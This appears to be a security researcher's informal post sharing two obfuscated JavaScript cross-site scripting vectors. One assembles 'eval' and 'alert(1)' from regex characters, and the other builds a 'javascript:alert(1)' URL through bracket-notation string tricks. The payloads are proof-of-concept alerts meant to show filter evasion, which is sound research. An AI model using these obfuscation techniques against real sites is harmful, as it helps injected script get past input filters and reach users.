I was bored on Sunday after footy, so I created 2 new vectors :-
Vector 1:-
$1 = /e1v1a1l/+''
$2 = []
$2 += $1[1]
$2 += $1[3]
$2 += $1[5]
$2 += $1[7]
$2 = $1[ $2 ]
$3 = /a1l1e1r1t1(1)1/+''
$4 = []
$4 += $3[1]
$4 += $3[3]
$4 += $3[5]
$4 += $3[7]
$4 += $3[9]
$4 += $3[11]
$4 += $3[12]
$4 += $3[13]
$2_ = $2
$4_ = $4
$2_ ( $4_ )
Vector 2:-
This next one is beautiful one liner which I've gotta supply some
information on the quirks of javascript.
Javascript allows you to call String functions on new strings like
''.StringFunction() as you probably know but interestingly it also
allows calling functions without dots and and as strings using []
brackets. So I used a regular expression with the .source property to
get the original string "replace" then I used a new regular expression
"/z/g" to replace the "z" from to string to create
"javascript:alert(1)" finally to create the replace I found a blank
string can be created using [] which completes the replace.
URL = ! isNaN(1) ? 'javascriptz:zalertz(1)z' [/replace/ [ 'source' ] ](/z/g, [] )
: 0
------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [
www.businessinfo.co.uk]
blog : [
www.thespanner.co.uk]
Hackvertor : [
hackvertor.co.uk]